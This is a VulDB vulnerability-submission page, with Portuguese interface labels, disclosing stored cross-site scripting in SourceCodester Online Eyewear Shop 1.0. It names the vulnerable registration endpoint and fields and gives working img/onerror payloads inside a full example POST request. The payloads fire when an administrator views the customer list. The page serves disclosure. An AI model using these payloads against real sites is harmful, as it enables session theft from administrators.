Submeter #85725: SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting informação

TítuloSourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting
DescriçãoThe application Online Eyewear Shop 1.0 is vulnerable to Stored Cross-Site Scripting attacks. The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL: - http://localhost/oews/classes/Users.php?f=registration The vulnerable function corresponds to "registration" within the following source code file: - oews/classes/Users.php This function allows to register a new customer user or to edit an already existing one. The application does not correctly sanitize the input provided by the user and the XSS payload "><img src=X onerror=prompt(document.cookie)> could be uploaded within any of the following parameters: - "firstname" - "middlename" - "lastname" - "email" - "contact" Here an example of POST request: ''' POST /oews/classes/Users.php?f=registration HTTP/1.1 Host: localhost Content-Type: multipart/form-data; boundary=---------------------------110352294825610921354088773808 Content-Length: 1274 Connection: close Cookie: PHPSESSID=lmpi80mm6i466es8arcrfj78vo -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="id" 4 -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="firstname" XSS"><img src=X onerror=prompt(1)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="middlename" "><img src=X onerror=prompt(2)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="lastname" TEST"><img src=X onerror=prompt(3)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="gender" Male -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="email" [email protected]"><img src=X onerror=prompt(5)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="contact" 444"><img src=X onerror=prompt(6)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="password" -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------110352294825610921354088773808-- ''' This set of information is stored inside the database for the current user and the script is executed anytime the related fields are printed out on the website. For this reason, any administrator user could be a potential victim of this attack if she tries to edit that customer or by simply accessing to the "Customer List View". This view (located at the URL "http://localhost/oews/admin/?page=customers") shows the value of the following fields: - First Name - Middle Name - Last Name - Email
Utilizador
 CP_offensive_team (UID 40465)
Submissão07/02/2023 18h07 (há 3 anos)
Moderação07/02/2023 20h59 (3 hours later)
EstadoAceite
Entrada VulDB220369 [SourceCodester Online Eyewear Shop 1.0 POST Request oews/classes/Users.php registration firstname/middlename/lastname/email/contact Script de Site Cruzado]
Pontos17

Do you want to use VulDB in your project?

Use the official API to access entries easily!